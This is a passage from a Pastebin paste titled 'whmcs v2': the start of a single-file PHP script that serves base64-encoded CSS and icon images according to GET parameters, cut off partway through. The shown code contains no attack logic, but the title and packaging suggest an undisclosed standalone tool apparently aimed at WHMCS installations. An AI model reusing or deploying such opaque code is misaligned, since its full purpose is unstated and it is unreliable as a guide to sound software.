Advertisement
CaptSalkus48

whmcs v2

Dec 31st, 2015
394
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 174.67 KB | None | 0 0
  1. <?php
  2. $currentFile = $_SERVER["SCRIPT_NAME"];
  3. $parts = Explode('/', $currentFile);
  4. $currentFile = $parts[count($parts) -1];
  5. if ($_GET['css']==1){
  6. header("Content-type: text/css", true);
  7. echo (str_replace('%file%', $currentFile,base64_decode('LyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCg0KCVJFU0VULkNTUw0KCXZlcnNpb246IDEuMA0KCXVwZGF0ZWQ6IDIwMDktMDItMDIsIDExOjQ3IEdNVCsxDQoNCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ICovDQoNCi8qID09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpSRVNFVA0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KKiB7bWFyZ2luOjA7IHBhZGRpbmc6MDt9DQpodG1sLCBib2R5LCBkaXYsIHNwYW4sIGFwcGxldCwgb2JqZWN0LCBpZnJhbWUsIGgxLCBoMiwgaDMsIGg0LCBoNSwgaDYsIHAsIGJsb2NrcXVvdGUsIHByZSwgYSwgYWJiciwgYWNyb255bSwgYWRkcmVzcywgY2l0ZSwgY29kZSwgZGVsLCBkZm4sIGVtLCBpbWcsIGlucywga2JkLCBxLCBzYW1wLCBzdHJvbmcsIHN1Yiwgc3VwLCB0dCwgdmFyLCBkbCwgZHQsIGRkLCBvbCwgdWwsIGxpLCBmaWVsZHNldCwgZm9ybSwgbGFiZWwsIGxlZ2VuZCwgdGFibGUsIGNhcHRpb24sIHRib2R5LCB0Zm9vdCwgdGhlYWQsIHRyLCB0aCwgdGQge2JvcmRlcjowOyBvdXRsaW5lOjA7IHZlcnRpY2FsLWFsaWduOmJhc2VsaW5lOyBiYWNrZ3JvdW5kOnRyYW5zcGFyZW50O30NCi5oaWRkZW4ge3Bvc2l0aW9uOmFic29sdXRlOyBsZWZ0Oi0xMDAwZW07IHRvcDotMTAwMGVtOyB3aWR0aDoxcHg7IGhlaWdodDoxcHg7IG92ZXJmbG93OmhpZGRlbjt9DQoubm9zY3JlZW4ge2Rpc3BsYXk6bm9uZTt9DQouYm94IHttaW4taGVpZ2h0OjFweDt9DQouYm94OmFmdGVyIHtkaXNwbGF5OmJsb2NrOyB2aXNpYmlsaXR5OmhpZGRlbjsgY2xlYXI6Ym90aDsgbGluZS1oZWlnaHQ6MDsgZm9udC1zaXplOjA7IGNvbnRlbnQ6Ii4iO30NCi5maXgge2Zsb2F0Om5vbmU7IGNsZWFyOmJvdGg7IHdpZHRoOjA7IGhlaWdodDowOyBtYXJnaW46MDsgcGFkZGluZzowOyBib3JkZXI6MDsgbGluZS1oZWlnaHQ6MDsgZm9udC1zaXplOjA7fQ0KLmYtbGVmdCB7ZmxvYXQ6bGVmdCAhaW1wb3J0YW50O30NCi5mLXJpZ2h0IHtmbG9hdDpyaWdodCAhaW1wb3J0YW50O30NCi50LWxlZnQge3RleHQtYWxpZ246bGVmdCAhaW1wb3J0YW50O30NCi50LWNlbnRlciB7dGV4dC1hbGlnbjpjZW50ZXIgIWltcG9ydGFudDt9DQoudC1yaWdodCB7dGV4dC1hbGlnbjpyaWdodCAhaW1wb3J0YW50O30NCi50LWp1c3RpZnkge3RleHQtYWxpZ246anVzdGlmeSAhaW1wb3J0YW50O30NCi52YS10b3Age3ZlcnRpY2FsLWFsaWduOnRvcCAhaW1wb3J0YW50O30NCi52YS1taWRkbGUge3ZlcnRpY2FsLWFsaWduOm1pZGRsZSAhaW1wb3J0YW50O30NCi52YS1ib3R0b20ge3ZlcnRpY2FsLWFsaWduOmJvdHRvbSAhaW1wb3J0YW50O30NCi5ub20ge21hcmdpbjowICFpbXBvcnRhbnQ7fQ0KLm5vbXQge21hcmdpbi10b3A6MCAhaW1wb3J0YW50O30NCi5ub21iIHttYXJnaW4tYm90dG9tOjAgIWltcG9ydGFudDt9')));
  8. exit;
  9. }
  10. if ($_GET['css']==2){
  11. header("Content-type: text/css", true);
  12. echo (str_replace('%file%', $currentFile,base64_decode('LyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCg0KCVNUWUxFLkNTUw0KCXZlcnNpb246IDEuNg0KCXVwZGF0ZWQ6IDIwMDktMDMtMDYsIDEzOjAwIEdNVCsxDQoNCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ICovDQoNCi8qID09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQpIVE1MIC0gc3R5bGVzDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSAqLw0KDQpib2R5IHtiYWNrZ3JvdW5kLWNvbG9yOiNlYWVhZWE7IGNvbG9yOiMzMDMwMzA7fQ0KYSB7Y29sb3I6IzAwODVjYzt9DQphOmhvdmVyLCBhOmFjdGl2ZSwgYTpmb2N1cyB7Y29sb3I6I2RmMDAwMDt9DQojY29udGVudCBoMiB7Y29sb3I6IzAwODVjYzt9DQojY29udGVudCB0YWJsZSB7Ym9yZGVyOjJweCBzb2xpZCAjY2ZjZmNmO30NCiNjb250ZW50IHRhYmxlIHRoIHtib3JkZXItcmlnaHQ6MXB4IHNvbGlkICMwMDc0QjM7IGJhY2tncm91bmQtY29sb3I6IzAwODVjYzsgY29sb3I6I2ZmZjt9DQojY29udGVudCB0YWJsZSB0ZCB7Ym9yZGVyOjFweCBzb2xpZCAjY2ZjZmNmO30NCiNjb250ZW50IHRhYmxlIHRyLmJnIHRkIHtiYWNrZ3JvdW5kLWNvbG9yOiNlOGY2ZmY7fQ0KI2NvbnRlbnQgdGFibGUgdGQuYmcyICB7YmFja2dyb3VuZC1jb2xvcjojZThmNmZmO30NCiNjb250ZW50IGRsIGR0IHtjb2xvcjojZGYwMDAwO30NCiNjb250ZW50IGZpZWxkc2V0IHtib3JkZXI6MXB4IHNvbGlkICNjY2M7fQ0KI2NvbnRlbnQgbGVnZW5kIHtiYWNrZ3JvdW5kOiNGRkY7IGNvbG9yOiMwMDg1Y2M7fQ0KI2NvbnRlbnQgYWNyb255bSwgI2NvbnRlbnQgYWJiciwgI2NvbnRlbnQgLmhlbHAge2JvcmRlci1ib3R0b206MXB4IGRvdHRlZCAjY2ZjZmNmO30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCkhUTUwgLSB3aXRob3V0IHN0eWxlcw0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KdGFibGUubm9zdHlsZSB0aCwgZGwubm9zdHlsZSBkdCB7Y29sb3I6IzMwMzAzMCAhaW1wb3J0YW50O30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCkxBWU9VVA0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KI3RyYXkge2JhY2tncm91bmQtY29sb3I6IzMwMzAzMDsgY29sb3I6I2NmY2ZjZjt9DQojdHJheSBhLCAjdHJheSBzdHJvbmcge2NvbG9yOiNmZmY7fQ0KI3RyYXkgYTpob3ZlciwgI3RyYXkgYTphY3RpdmUsICN0cmF5IGE6Zm9jdXMge2NvbG9yOiNiNGUzZmY7fQ0KI21lbnUge2JhY2tncm91bmQtY29sb3I6IzAwODVjYzt9DQojbWVudSB1bCBsaSBhIHtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7IGNvbG9yOiMzMDMwMzA7fQ0KI21lbnUgdWwgbGkgYSBzcGFuIHtiYWNrZ3JvdW5kLWNvbG9yOiNGRkY7fQ0KI21lbnUgdWwgbGkgYTpob3ZlciwgI21lbnUgdWwgbGkgYTphY3RpdmUsICNtZW51IHVsIGxpIGE6Zm9jdXMsICNtZW51IHVsIGxpI21lbnUtYWN0aXZlIGEge2JhY2tncm91bmQtY29sb3I6I0ZGRjsgY29sb3I6I2RmMDAwMDt9DQojbWVudSB1bCBsaSBhOmhvdmVyIHNwYW4sICNtZW51IHVsIGxpI21lbnUtYWN0aXZlIGEgc3BhbiB7YmFja2dyb3VuZC1jb2xvcjojRkZGO30NCiNtZW51IHVsIGxpI21lbnUtYWN0aXZlIGEge2NvbG9yOiMwMDg1Y2M7fQ0KI21lbnUgdWwuZi1yaWdodCBhIHtjb2xvcjojZGYwMDAwO30NCiNjb250ZW50IHtib3JkZXI6MXB4IHNvbGlkICNhZmFmYWY7IGJhY2tncm91bmQ6I2ZmZjt9DQoNCiNmb290ZXIge2NvbG9yOiM3MDcwNzA7fQ0KI2Zvb3RlciBhIHtjb2xvcjojNzA3MDcwO30NCiNmb290ZXIgYTpob3ZlciwgI2Zvb3RlciBhOmFjdGl2ZSwgI2Zvb3RlciBhOmZvY3VzIHtjb2xvcjojMzAzMDMwO30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCk9USEVSUw0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gKi8NCg0KI2FzaWRlICNsb2dvIGltZyB7Ym9yZGVyOjFweCBzb2xpZCAjYmZiZmJmO30NCiNhc2lkZSAjc2VhcmNoIGZpZWxkc2V0IGEge2NvbG9yOiMzMDMwMzA7fQ0KI2FzaWRlICNzZWFyY2ggZmllbGRzZXQge2JvcmRlcjoxcHggc29saWQgI2JmYmZiZjt9DQojYXNpZGUgI3NlYXJjaCBmaWVsZHNldCBhOmhvdmVyLCAjYXNpZGUgI3NlYXJjaCBmaWVsZHNldCBhOmFjdGl2ZSwgI2FzaWRlICNzZWFyY2ggZmllbGRzZXQgYTpmb2N1cyB7Y29sb3I6I2RmMDAwMDt9DQojYXNpZGUgI2J0bi1jcmVhdGUgYSB7YmFja2dyb3VuZC1jb2xvcjojZmZmOyBjb2xvcjojMzAzMDMwO30NCiNhc2lkZSAjYnRuLWNyZWF0ZSBhIHNwYW4ge2JhY2tncm91bmQtY29sb3I6I2ZmZjt9DQojYXNpZGUgdWwgbGkgYSB7Ym9yZGVyLWJvdHRvbToxcHggc29saWQgI2NmY2ZjZjsgY29sb3I6IzMwMzAzMDt9DQojYXNpZGUgdWwgbGkjc3VibWVudS1hY3RpdmUgYSB7YmFja2dyb3VuZC1jb2xvcjojZGYwMDAwOyBjb2xvcjojZmZmO30NCiNhc2lkZSB1bCBsaSBhOmhvdmVyLCAjYXNpZGUgdWwgbGkgYTphY3RpdmUsICNhc2lkZSB1bCBsaSBhOmZvY3VzIHtjb2xvcjojZGYwMDAwO30NCiNhc2lkZSB1bCB1bCBsaSBhLCAjYXNpZGUgdWwgbGkjc3VibWVudS1hY3RpdmUgdWwgbGkgYSB7Ym9yZGVyLWJvdHRvbToxcHggc29saWQgI2NmY2ZjZjsgYmFja2dyb3VuZC1jb2xvcjojZjVmNWY1OyBjb2xvcjojMzAzMDMwO30NCiNhc2lkZSB1bCBsaSB1bCBsaSBhIHtiYWNrZ3JvdW5kLWNvbG9yOiNlM2UzZTM7fQ0KI2FzaWRlIHVsIHVsIGxpIGE6aG92ZXIsICNhc2lkZSB1bCB1bCBsaSBhOmFjdGl2ZSwgI2FzaWRlIHVsIHVsIGxpIGE6Zm9jdXMsICNhc2lkZSB1bCBsaSNzdWJtZW51LWFjdGl2ZSB1bCBsaSBhOmhvdmVyLCAjYXNpZGUgdWwgbGkjc3VibWVudS1hY3RpdmUgdWwgbGkgYTphY3RpdmUsICNhc2lkZSB1bCBsaSNzdWJtZW51LWFjdGl2ZSB1bCBsaSBhOmZvY3VzIHtjb2xvcjojZGYwMDAwO30NCiNjb250ZW50IGgxIHtiYWNrZ3JvdW5kLWNvbG9yOiMzMDMwMzA7IGNvbG9yOiNmZmY7fQ0KI2NvbnRlbnQgLnRhYnMge2JvcmRlci1ib3R0b206MXB4IHNvbGlkICNjZmNmY2Y7fQ0KI2NvbnRlbnQgLnRhYnMgYSB7Y29sb3I6IzMwMzAzMDt9DQojY29udGVudCAudGFicyBhIHNwYW4ge2NvbG9yOiMzMDMwMzA7fQ0KI2NvbnRlbnQgLnRhYnMgLnVpLXRhYnMtc2VsZWN0ZWQgYSB7Y29sb3I6I2ZmZjt9DQojY29udGVudCAudGFicyAudWktdGFicy1zZWxlY3RlZCBhIHNwYW4ge2NvbG9yOiNmZmY7fQ0KLmhpZ2gge2NvbG9yOiNkZjAwMDA7fQ0KLmhpZ2gtYmcge2JhY2tncm91bmQ6I0ZGQjt9DQoubG93IHtjb2xvcjojNzA3MDcwO30NCg0KLyogPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCk1FU1NBR0VTDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSAqLw0KDQoubXNnLndhcm5pbmcge2JvcmRlcjoycHggc29saWQgI0YyREQ4QzsgYmFja2dyb3VuZC1jb2xvcjojRkZGNUNDO30NCi5tc2cud2FybmluZyBhIHtjb2xvcjojZGYwMDAwO30gLm1zZy53YXJuaW5nIGE6aG92ZXIsIC5tc2cud2FybmluZyBhOmFjdGl2ZSwgLm1zZy53YXJuaW5nIGE6Zm9jdXMge2NvbG9yOiMzMDMwMzA7fQ0KLm1zZy5pbmZvIHtib3JkZXI6MnB4IHNvbGlkICNCOEUyRkI7IGJhY2tncm91bmQtY29sb3I6I0U4RjZGRjt9DQoubXNnLmRvbmUge2JvcmRlcjoycHggc29saWQgI0JCREY4RDsgYmFja2dyb3VuZC1jb2xvcjojRUFGN0Q5O30NCi5tc2cuZXJyb3Ige2JvcmRlcjoycHggc29saWQgI0ZGQUVBRTsgYmFja2dyb3VuZC1jb2xvcjojRkVFQkVCO30NCg==')));
  13. exit;
  14. } if ($_GET['css']==3){
  15. header("Content-type: text/css", true);
  16. echo (str_replace('%file%', $currentFile,base64_decode('I2NvbHMge21hcmdpbjoxNXB4OyBiYWNrZ3JvdW5kOm5vbmU7fQ0KI2FzaWRlLCAjdHJheSAuaWNvLWNvbDEge2Rpc3BsYXk6bm9uZTt9DQo=')));
  17. exit;
  18. } if ($_GET['css']==4){
  19. header("Content-type: text/css", true);
  20. echo (str_replace('%file%', $currentFile,base64_decode('I2NvbHMge3Bvc2l0aW9uOnJlbGF0aXZlOyBtYXJnaW46MTVweCAwOyBwYWRkaW5nLXJpZ2h0OjE1cHg7IGJhY2tncm91bmQ6dXJsKCIlZmlsZSU/aW1nPTUiKSAyMzBweCAwIHJlcGVhdC15O30NCiNhc2lkZSB7ZmxvYXQ6bGVmdDsgd2lkdGg6MjE1cHg7IG1hcmdpbi1yaWdodDowO30NCiNjb250ZW50IHttYXJnaW4tbGVmdDoyMzJweDsgb3ZlcmZsb3c6dmlzaWJsZTt9DQojdHJheSAuaWNvLWNvbDIge2Rpc3BsYXk6bm9uZTt9DQoNCmh0bWw+Ym9keSAjYXNpZGUge21hcmdpbi1yaWdodDoyMHB4O30NCmh0bWw+Ym9keSAjY29udGVudCB7bWFyZ2luLWxlZnQ6MDsgb3ZlcmZsb3c6aGlkZGVuO30=')));
  21. exit;
  22. }
  23. if ($_GET['css']==5){
  24. header("Content-type: text/css", true);
  25. echo (str_replace('%file%', $currentFile,base64_decode('')));
  26. exit;
  27. }
  28. if ($_GET['img']=="0"){
  29. header("Content-Type: image/gif");
  30. echo (base64_decode(''));
  31. exit;
  32. }if ($_GET['img']==1){
  33. header("Content-Type: image/gif");
  34. echo (base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5Ojf/2wBDAQoKCg0MDRoPDxo3JR8lNzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzf/wAARCAAqACcDASIAAhEBAxEB/8QAGgAAAwEBAQEAAAAAAAAAAAAAAAUGBwQDAv/EADEQAAEEAQQBAAgEBwAAAAAAAAECAwQRBQAGEiETFRYjMTJBUWEiJjV1MzRCU2KztP/EABQBAQAAAAAAAAAAAAAAAAAAAAD/xAAUEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwDcdKNx55nCR2/ZqkzpBKIkRB/E8rr7GkixaqNWAASUpPvn8i5icRInMQZE51oDhHjoKlrUSAOgCaF2SASACaNVqRwE7Hxco3Ozbk6RnMi8mO247i5LDSLum2y4gBIA5GruuXvJUVB6+quZ/X/SP5m+L3Dw+P8Ascb+D/G6vu+XtNUW3M8zm47ns1Rp0chEuIs/iZV39haTRpVC6IIBCkhvqD3BMgSsgMngnMgzl4bq2DIbxEt1l3irittZQ2QtNpo0f6RRBCVJC80aX4DIuZbER5z8GRBddB5x5CClaFAkHogGjVgkAkEGhdaNAw1Kb6/nNqfvrX+l7Xczu/CvzEw235JkHifGYT4ICiQCbR0CQez10ddecwzGZYjodeeYdjPpkR32Cnm04kEWAoFJ6UoUoEd/WiAZaR7N/SJH7pkP+t7SXITGcdNEOXvPcKHyrilIxzCuZrlSSIpCurPX0OqjCRY8TFsoiKdW25yeLjwpbinFFalqFCipSiSKAF0AB0A7tGjRoI3PRMsvN7hexDbqJLmAaaiPAUkvBcg8Qr3chySftY18bUZYTuHng4k6LixA4y0ymnW+Ujmnh04ASsJ8nJQ+qbJ1a6NAg3BHfd3Bth1plxbbM15Tq0pJDYMZ1IKj8hZA7+ZGpdmNJ9KM3GnesYzJW9JLbniMPyk/HXDx+GkhN/F8r1o+jQZTt9tUtjFOYRuZ6bTMkmVLcbd8YZt0UpahxUm+FJBPY6HR0a0LbLaGsMyhpCUJC3KSkUP4itGg/9k='));
  35. exit;
  36. }
  37. //btn-create-left.gif
  38. if ($_GET['img']==2){
  39. header('Content-Type: image/gif');
  40. echo (base64_decode('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'));
  41. exit;
  42. }
  43. //-----------
  44. //btn-create-right.gif
  45. if ($_GET['img']==3){
  46. header('Content-Type: image/gif');
  47. echo (base64_decode('R0lGODlhrwAlANUAAP////7+/v39/erq6rKystfX1+Dg4Nvb2+fn5/f39/n5+fDw8OXl5e7u7vj4+OLi4uvr6/z8/PT09PPz8/Hx8fr6+vv7+/b29tjY2N7e3tTU1NLS0ubm5rS0tOnp6bm5udnZ2cTExNHR0e/v793d3cPDw+jo6L29vcnJycbGxt/f38XFxcDAwMLCwqurq9ra2ri4uM7Ozq6ursjIyKysrOPj4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACvACUAAAb/QIBwSCwaj8ikcslsOp/QaDMxYnA8g+xAyu16v+CwV8AxmLTitHrNbhdHB07WTa/b78YaCLHF+/+AXQExKh6Bh4iJRiQiHAGPkJGSk5SVlpeYmZqbnJ2enwELJQagpaanqKmqnwofB6uwsbKztI8dILW5uru8kAQFAsHCw8TFxsfIycrLzM3Oz9DRwb/S1dbX2Nna0r8R3t/g4eLj5OXm5+jp6uvs7e7evxby8/T19vf4+fr7/P3+/wADCpT3q4LBgwgTKlzIsKHDhxAjSpxIsaJFg78UaNzIsaPHjyBDihxJsqTJkyhTqtT4y4HLlzBjypxJs6bNmzhz6tzJs6dP/5e/EggdSrSo0aNIkypdyrSp06dQo0oV+uuC1atYs2rdyrWr169gw4odS7asWau/JKhdy7at27dw48qdS7eu3bt48+pV+2uC37+AAwseTLiw4cOIEytezLixY7+/KEieTLmy5cuYM2vezLmz58+gQ4uW/GuB6dOoU6tezbq169ewY8ueTbu2bdO/Gujezbu379/AgwsfTry48ePIkyvX/QuC8+fQo0ufTr269evYs2vfzr27d+e/tIgfT768+fPo06tfz769+/fwx/9CQL++/fv48+vfz7+///8ABijggATS9wsDCCao4IIMNujggxBGKOGEFFZo4YUYMvDALw906P/hhyCGKOKIJJZo4okopqjiiiy2+EABHWBgwIw01mjjjTjmqOOOPPbo449ABinkkAas4EoGSCap5JJMNunkk1BGKeWUVFZp5ZVYkkDAKAd06eWXYIYp5phklmnmmWimqeaabLbZAgGNYCDnnHTWaeedeOap55589unnn4AGGugMLoSQgQcaJKrooow26uijkEYq6aSUVmrppZhaugEMNLCwxwAbhCrqqKSWauqpqKaq6qqsturqq7CyisIJMnSQwgtyDEDArrz26uuvwAYr7LDEFmvsscgmq6yxHXwQwgZmaFHAtNRWa+212Gar7bbcduvtt+CGK663GBxgwBXiBQEAOw=='));
  48. exit;
  49. }
  50. //-----------
  51. //content-h1.gif
  52. if ($_GET['img']==4){
  53. header('Content-Type: image/gif');
  54. echo (base64_decode('R0lGODlhAQA3AMQAADAwMDExMTU1NTIyMk5OTjQ0NDg4OD4+PjMzM0xMTDs7O0pKSlBQUElJSTw8PDc3NzY2NkBAQEVFRUhISDo6OkREREFBQUJCQj8/P0dHR0ZGRjk5OUNDQwAAAAAAAAAAACH5BAAAAAAALAAAAAABADcAAAUmIMMQZJIsSzNlmlRxlxVhx+EoCrUZxgMJwEIBgRgYA0gkYMlkhgAAOw=='));
  55. exit;
  56. }
  57. //-----------
  58. //content.gif
  59. if ($_GET['img']==5){
  60. header('Content-Type: image/gif');
  61. echo (base64_decode('R0lGODlhBQABAKIAAOjo6OPj49zc3NLS0sfHxwAAAAAAAAAAACH5BAAAAAAALAAAAAAFAAEAAAMECCFDCQA7'));
  62. exit;
  63. }
  64. //-----------
  65. //dot.gif
  66. if ($_GET['img']==6){
  67. header('Content-Type: image/gif');
  68. echo (base64_decode('R0lGODlhAwABAIABAM/Pz////yH5BAEAAAEALAAAAAADAAEAAAICRFIAOw=='));
  69. exit;
  70. }
  71. //-----------
  72. //ico-delete.gif
  73. if ($_GET['img']==7){
  74. header('Content-Type: image/gif');
  75. echo (base64_decode('R0lGODlhEAAQAIABAN8AAP///yH5BAEAAAEALAAAAAAQABAAAAIhjI+py82Q4AL0UIlu1djy+3wON4rTV0VaQKoYOEXOTB8FADs='));
  76. exit;
  77. }
  78. //-----------
  79. //ico-done.gif
  80. if ($_GET['img']==8){
  81. header('Content-Type: image/gif');
  82. echo (base64_decode('R0lGODlhEAAQAIABACewC////yH5BAEAAAEALAAAAAAQABAAAAIfjI+py+0I3gFU0utuTdHoDlWf8mlMCS7jg0lB6sZPAQA7'));
  83. exit;
  84. }
  85. //-----------
  86. //ico-info.gif
  87. if ($_GET['img']==9){
  88. header('Content-Type: image/gif');
  89. echo (base64_decode('R0lGODlhEAAQAMQVAACFzP///wyLznvA5fP5/SGV0zCc1oHD5gOGzcDh8jmg1+r1+67Y7+32+w+Mz37B5Taf16vX7rre8bfd8QaIzf///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAABUALAAAAAAQABAAAAVUYCWOZFkSh4IgykGYVVIAdF0kJVPvNTM2gl0gsBM0RAOeEjAQGYRDnkFE4UV3DpHDSiw6uVIk9EprVhbBJU2wGEXUtEhJMuMVJjDCA0KDPF4wgSQhADs='));
  90. exit;
  91. }
  92. //-----------
  93. //ico-warning.gif
  94. if ($_GET['img']==10){
  95. header('Content-Type: image/gif');
  96. echo (base64_decode('R0lGODlhEAAQAKIEAN8AAP///+UvL+QqKv///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM0SLokwhACEKuYo8pJtbpc5nGcBwYBpnFoGYFAq26TPEFwnIYM6bsNn232G95yP9IgyQQkAAA7'));
  97. exit;
  98. }
  99. //-----------
  100. //menu-left.gif
  101. if ($_GET['img']==11){
  102. header('Content-Type: image/gif');
